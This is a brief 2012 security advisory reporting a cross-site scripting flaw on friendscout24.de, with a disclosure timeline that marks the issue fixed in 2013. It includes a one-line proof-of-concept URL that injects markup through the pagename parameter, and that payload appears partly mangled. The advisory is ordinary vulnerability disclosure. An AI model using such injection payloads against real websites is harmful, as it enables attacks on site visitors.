Advisory: www.friendscout24.de - Cross-site Scripting vulnerability Advisory ID: SSCHADV2012-025 Author: Stefan Schurtz Affected Software: Successfully tested on www.friendscout24.de Vendor URL: http://www.friendscout24.de Vendor Status: informed ========================== Vulnerability Description ========================== http://www.friendscout24.de is prone to a XSS vulnerability ========================== PoC-Exploit ========================== www.friendscout24.de/iftracking.html?pagename=GUEST_LP_26674_de_partnersuche_17'">®tracking=true ========================== Solution ========================== - ========================== Disclosure Timeline ========================== 23-Dec-2012 - informed by contact form 13-Feb-2013 - fixed ========================== Credits ========================== Vulnerability found and advisory written by Stefan Schurtz. ========================== References ========================== http://www.darksecurity.de/advisories/2012/SSCHADV2012-025.txt